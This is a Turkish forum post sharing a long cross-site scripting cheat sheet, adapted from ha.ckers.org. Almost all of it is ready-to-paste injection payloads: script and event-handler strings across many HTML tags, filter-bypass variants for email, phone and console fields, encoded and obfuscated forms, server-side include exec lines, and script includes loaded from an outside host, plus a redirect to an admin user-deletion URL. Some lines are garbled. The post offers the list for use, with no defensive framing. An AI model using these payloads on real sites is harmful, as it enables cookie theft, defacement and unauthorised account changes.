XSS(Cross Site Scripting) Strings

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek

    Umarım işinize yarar arkaşlar  Güzel bir xss kaynağı değerlendirmesini bilene

    http://ha.ckers.org/xss.html  buradan gerekli bilgiyi alabilirsiniz bu konuda daha detaylı kodları ise aşşağıda belirteceğim biraz uzun umarım işinize yarar

    <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
    <SCRIPT>document.cookie=true;</SCRIPT>
    <IMG SRC="jav ascript:document.cookie=true;">
    <IMG SRC="javascript:document.cookie=true;">
    <IMG SRC=" &#14; javascript:document.cookie=true;">
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
    <SCRIPT>document.cookie=true;//<</SCRIPT>
    <SCRIPT <B>document.cookie=true;</SCRIPT>
    <IMG SRC="javascript:document.cookie=true;">
    <iframe src="javascript:document.cookie=true;> 
    <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
    </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
    <BODY BACKGROUND="javascript:document.cookie=true;">
    <BODY ONLOAD=document.cookie=true;>
    <IMG DYNSRC="javascript:document.cookie=true;">
    <IMG LOWSRC="javascript:document.cookie=true;">
    <BGSOUND SRC="javascript:document.cookie=true;">
    <BR SIZE="&{document.cookie=true}">
    <LAYER SRC="javascript:document.cookie=true;"></LAYER>
    <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
    <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
    ¼script¾document.cookie=true;¼/script¾ 
    <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
    <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
    <TABLE BACKGROUND="javascript:document.cookie=true;">
    <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
    <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
    <DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
    <DIV STYLE="width: expression(document.cookie=true);">
    <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
    <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
    <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
    exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
    <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
    <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
    <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
    <SCRIPT>document.cookie=true;</SCRIPT>
    <BASE HREF="javascript:document.cookie=true;//">
    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
    <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
    <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
    <a href="javascript#document.cookie=true;">
    <div onmouseover="document.cookie=true;">
    <img src="javascript:document.cookie=true;">
    <img dynsrc="javascript:document.cookie=true;">
    <input type="image" dynsrc="javascript:document.cookie=true;">
    <bgsound src="javascript:document.cookie=true;">
    &<script>document.cookie=true;</script> 
    &{document.cookie=true;}; 
    <img src=&{document.cookie=true;};> 
    <link rel="stylesheet" href="javascript:document.cookie=true;"> 
    <img src="mocha:document.cookie=true;"> 
    <img src="livescript:document.cookie=true;"> 
    <a href="about:<script>document.cookie=true;</script>"> 
    <body onload="document.cookie=true;"> 
    <div style="background-image: url(javascript:document.cookie=true;);"> 
    <div style="behaviour: url([link to code]);"> 
    <div style="binding: url([link to code]);"> 
    <div style="width: expression(document.cookie=true;);">
    <style type="text/javascript">document.cookie=true;</style>
    <object classid="clsid:..." codebase="javascript:document.cookie=true;">
    <style><!--</style><script>document.cookie=true;//--></script>
    <<script>document.cookie=true;</script>
    <script>document.cookie=true;//--></script>
    <!-- -- --><script>document.cookie=true;</script><!-- -- -->
    <img src="blah"onmouseover="document.cookie=true;">
    <img src="blah>" onmouseover="document.cookie=true;">
    <xml src="javascript:document.cookie=true;">
    <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
    
    
    
    Cross Site Scripting Strings with close TAG:
    
    >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
    >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
    >"<SCRIPT>document.cookie=true;</SCRIPT>
    >"<IMG SRC="jav ascript:document.cookie=true;">
    >"<IMG SRC="javascript:document.cookie=true;">
    >"<IMG SRC=" &#14; javascript:document.cookie=true;">
    >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
    >"<SCRIPT>document.cookie=true;//<</SCRIPT>
    >"<SCRIPT <B>document.cookie=true;</SCRIPT>
    >"<IMG SRC="javascript:document.cookie=true;">
    >"<iframe src="javascript:document.cookie=true;> 
    >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
    >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
    >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
    >"<BODY BACKGROUND="javascript:document.cookie=true;">
    >"<BODY ONLOAD=document.cookie=true;>
    >"<IMG DYNSRC="javascript:document.cookie=true;">
    >"<IMG LOWSRC="javascript:document.cookie=true;">
    >"<BGSOUND SRC="javascript:document.cookie=true;">
    >"<BR SIZE="&{document.cookie=true}">
    >"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
    >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
    >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
    >"¼script¾document.cookie=true;¼/script¾ 
    >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
    >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
    >"<TABLE BACKGROUND="javascript:document.cookie=true;">
    >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
    >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
    >"<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
    >"<DIV STYLE="width: expression(document.cookie=true);">
    >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
    >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
    >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
    >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
    >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
    >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
    >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
    >"<SCRIPT>document.cookie=true;</SCRIPT>
    >"<BASE HREF="javascript:document.cookie=true;//">
    >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
    >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
    >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
    >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
    >"<a href="javascript#document.cookie=true;">
    >"<div onmouseover="document.cookie=true;">
    >"<img src="javascript:document.cookie=true;">
    >"<img dynsrc="javascript:document.cookie=true;">
    >"<input type="image" dynsrc="javascript:document.cookie=true;">
    >"<bgsound src="javascript:document.cookie=true;">
    >"&<script>document.cookie=true;</script> 
    >"&{document.cookie=true;}; 
    >"<img src=&{document.cookie=true;};> 
    >"<link rel="stylesheet" href="javascript:document.cookie=true;"> 
    >"<img src="mocha:document.cookie=true;"> 
    >"<img src="livescript:document.cookie=true;"> 
    >"<a href="about:<script>document.cookie=true;</script>"> 
    >"<body onload="document.cookie=true;"> 
    >"<div style="background-image: url(javascript:document.cookie=true;);"> 
    >"<div style="behaviour: url([link to code]);"> 
    >"<div style="binding: url([link to code]);"> 
    >"<div style="width: expression(document.cookie=true;);">
    >"<style type="text/javascript">document.cookie=true;</style>
    >"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
    >"<style><!--</style><script>document.cookie=true;//--></script>
    >"<<script>document.cookie=true;</script>
    >"<script>document.cookie=true;//--></script>
    >"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
    >"<img src="blah"onmouseover="document.cookie=true;">
    >"<img src="blah>" onmouseover="document.cookie=true;">
    >"<xml src="javascript:document.cookie=true;">
    >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
    >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
    
    
    
    Cross Site Scripting Strings with negative value & TAG:
    -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
    -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
    -1<SCRIPT>document.cookie=true;</SCRIPT>
    -1<IMG SRC="jav ascript:document.cookie=true;">
    -1<IMG SRC="javascript:document.cookie=true;">
    -1<IMG SRC=" &#14; javascript:document.cookie=true;">
    -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
    -1<SCRIPT>document.cookie=true;//<</SCRIPT>
    -1<SCRIPT <B>document.cookie=true;</SCRIPT>
    -1<IMG SRC="javascript:document.cookie=true;">
    -1<iframe src="javascript:document.cookie=true;> 
    -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
    -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
    -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
    -1<BODY BACKGROUND="javascript:document.cookie=true;">
    -1<BODY ONLOAD=document.cookie=true;>
    -1<IMG DYNSRC="javascript:document.cookie=true;">
    -1<IMG LOWSRC="javascript:document.cookie=true;">
    -1<BGSOUND SRC="javascript:document.cookie=true;">
    -1<BR SIZE="&{document.cookie=true}">
    -1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
    -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
    -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
    -1¼script¾document.cookie=true;¼/script¾ 
    -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
    -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
    -1<TABLE BACKGROUND="javascript:document.cookie=true;">
    -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
    -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
    -1<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)">
    -1<DIV STYLE="width: expression(document.cookie=true);">
    -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
    -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
    -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
    -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
    -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
    -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
    -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
    -1<SCRIPT>document.cookie=true;</SCRIPT>
    -1<BASE HREF="javascript:document.cookie=true;//">
    -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
    -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
    -1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
    -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
    -1<a href="javascript#document.cookie=true;">
    -1<div onmouseover="document.cookie=true;">
    -1<img src="javascript:document.cookie=true;">
    -1<img dynsrc="javascript:document.cookie=true;">
    -1<input type="image" dynsrc="javascript:document.cookie=true;">
    -1<bgsound src="javascript:document.cookie=true;">
    -1&<script>document.cookie=true;</script> 
    -1&{document.cookie=true;}; 
    -1<img src=&{document.cookie=true;};> 
    -1<link rel="stylesheet" href="javascript:document.cookie=true;"> 
    -1<img src="mocha:document.cookie=true;"> 
    -1<img src="livescript:document.cookie=true;"> 
    -1<a href="about:<script>document.cookie=true;</script>"> 
    -1<body onload="document.cookie=true;"> 
    -1<div style="background-image: url(javascript:document.cookie=true;);"> 
    -1<div style="behaviour: url([link to code]);"> 
    -1<div style="binding: url([link to code]);"> 
    -1<div style="width: expression(document.cookie=true;);">
    -1<style type="text/javascript">document.cookie=true;</style>
    -1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
    -1<style><!--</style><script>document.cookie=true;//--></script>
    -1<<script>document.cookie=true;</script>
    -1<script>document.cookie=true;//--></script>
    -1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
    -1<img src="blah"onmouseover="document.cookie=true;">
    -1<img src="blah>" onmouseover="document.cookie=true;">
    -1<xml src="javascript:document.cookie=true;">
    -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
    -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
    
    
    Cross Site Scripting Strings Restriction Bypass Mail:
    
    >"<iframe src=http://tahribat.com/>@gmail.com
    >"<script>alert(document.cookie)</script><div style="1@gmail.com
    >"<script>alert(document.cookie)</script>@gmail.com
    
    <iframe src=http://tahribat.com/>@gmail.com
    <script>alert(document.cookie)</script><div style="1@gmail.com
    <script>alert(document.cookie)</script>@gmail.com
    
    
    Cross Site Scripting Strings Restriction Bypass Phone:
    +49/>"<iframe src=http://tahribat.com>1337
    "><iframe src='' onload=alert('mphone')>
    <iframe src=http://tahribat.com>1337+1
    
    
    Cross Site Scripting Strings Restriction Bypass Obfuscation
    
    >“<ScriPt>ALeRt("VlAb")</scriPt>
    >"<IfRaMe sRc=http://tahribat.com></IfRaMe> 
    
    
    Cross Site Scripting Strings Restriction Bypass String to Charcode
    
    <html><body>
    <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
    101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
    10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
    om.Char.Code</button></body></html>
    
    
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
    '';!--"<CrossSiteScripting>=&{()}
    
    
    
    Cross Site Scripting Strings Restriction Bypass encoded frame url
    
    %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
    %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
    %73%63%72%69%70%74%3E
    
    
    
    Cross Site Scripting Strings via Console:
    set vlan name 1337 <script>alert(document.cookie)</script>
    set system name <iframe src=http://tahribat.com>
    set system location "><iframe src=a onload=alert("VL") <
    set system contact <script>alert('VL')</script>
    
    insert <script>alert(document.cookie)</script>
    add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://tahribat.com/CrossSiteScripting.js></SCRIPT>'"-->
    add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
    
    add topic <iframe src=http://tahribat.com>
    add name <script>alert('VL')</script>
    
    perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
    perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out
    
    <!--[if gte IE 4]>   <SCRIPT>alert('CrossSiteScripting');</SCRIPT>   <![endif]-->
    
    
    
    
    Cross Site Scripting Strings  on per line validation applications:
    
    <IMG
    SRC
    =
    "
    j
    a
    v
    a
    s
    c
    r
    i
    p
    t
    :
    a
    l
    e
    r
    t
    (
    '
    V
    L
    A
    B
    '
    )
    "
    >
    
    
    
    Cross Site Scripting Strings Embed:
    
    <EMBED SRC="http://tahribat.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>
    
    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
    
    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
    
    
    
    Cross Site Scripting Strings  Action Script:
    
           <object type="application/x-shockwave-flash" data="http://tahribat.com/hack.swf" width="300" height="300">
               <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
                     <param name="quality" value="high" />
                     <param name="scale" value="noscale" />
                     <param name="salign" value="LT" />
           <param name="allowScriptAccess" value="always" />
                     <param name="menu" value="false" />
                </object>
    
    
    
    
    <SCRIPT SRC=http://tahribat.com/CrossSiteScripting.js></SCRIPT>
    <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
    <SCRIPT SRC=http://tahribat.com/CrossSiteScripting.js?<B>
    <SCRIPT SRC=//vulnerability-lab.com/.js>
    <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
    <SCRIPT a=">" SRC="http://tahribat.com/CrossSiteScripting.js"></SCRIPT>
    <SCRIPT a=`>` SRC="http://tahribat.com/CrossSiteScripting.js"></SCRIPT>
    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://tahribat.com/CrossSiteScripting.js"></SCRIPT>
    </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>
    
    
    <IMG SRC="javascript:alert('CrossSiteScripting');">
    <IMG SRC=javascript:alert('CrossSiteScripting')>
    <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
    <IMG SRC=javascript:alert(&quot;CrossSiteScripting&quot;)>
    <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
    <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC="jav	ascript:alert('CrossSiteScripting');">
    <IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
    <IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
    <IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
    <IMG SRC=" &#14;  javascript:alert('CrossSiteScripting');">
    <IMG SRC="javascript:alert('CrossSiteScripting')"
    <IMG DYNSRC="javascript:alert('CrossSiteScripting')">
    <IMG LOWSRC="javascript:alert('CrossSiteScripting')">
    <IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
    <IMG SRC="mocha:[code]">
    <IMG SRC="livescript:[code]">
    
    
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
    <META HTTP-EQUIV="Link" Content="<http://tahribat.com/CrossSiteScripting.css>; REL=stylesheet">
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('CrossSiteScripting')&lt;/SCRIPT&gt;">
    <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
    
    
    <OBJECT TYPE="text/x-scriptlet" DATA="http://tahribat.com/scriptlet.html"></OBJECT>
    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>
    
    
    <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
    <STYLE>@import'http://tahribat.com/CrossSiteScripting.css';</STYLE>
    <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
    <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
    <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
    <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
    <STYLE>BODY{-moz-binding:url("http://tahribat.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
    
    
    <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
    <DIV STYLE="background-image: url(&#1;javascript:alert('CrossSiteScripting'))">
    <DIV STYLE="width: expression(alert('CrossSiteScripting'));">
    
    <LAYER SRC="http://tahribat.com/script.html"></LAYER>
    <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
    <LINK REL="stylesheet" HREF="http://tahribat.com/CrossSiteScripting.css">
    
    <BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
    <BODY ONLOAD=alert('CrossSiteScripting')>
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
    <iframe src=http://tahribat.com/index.html <
    
    
    <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
    <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">
    
    <BGSOUND SRC="javascript:alert('CrossSiteScripting');">
    <BR SIZE="&{alert('CrossSiteScripting')}">
    
    
    <A HREF="http://server.com/">CrossSiteScripting</A>
    <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
    <A HREF="http://1113982867/">CrossSiteScripting</A>
    <A HREF="javascript:document.location='http://tahribat.com/'">CrossSiteScripting</A>
    
    <BASE HREF="javascript:alert('CrossSiteScripting');//">
    
    \";alert('CrossSiteScripting');//
    
    <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">
    
    
    
    
    <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">
    
    
    ¼script¾alert(¢CrossSiteScripting¢)¼/script¾
    
    
    
    <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
    <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))">  exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");  CrossSiteScripting:&#101;x&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>
    
    
    
    
    
    a="get";
    b="URL(\"";
    c="javascript:";
    d="alert('CrossSiteScripting');\")";
    eval(v+l+a+b);
    
    <HTML xmlns:CrossSiteScripting>
      <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
      <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>
    
    <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
    </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    
    
    <XML ID="CrossSiteScripting"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"&gt;</B></I></XML>
    <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
    
    
    <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    
    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="CrossSiteScripting&lt;SCRIPT DEFER&gt;alert(&quot;CrossSiteScripting&quot;)&lt;/SCRIPT&gt;">
    </BODY></HTML>
    
    <SCRIPT SRC="http://tahribat.com/CrossSiteScripting.jpg"></SCRIPT>
    
    <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://tahribat.com/CrossSiteScripting.js></SCRIPT>'"-->
    
    <? echo('<SCR)';
    echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>
    
    <IMG SRC="http://tahribat.com/file.php?variables=malicious">
    
    Redirect 302 /vlab.jpg http://tahribat.com/admin.asp&deleteuser
    
    
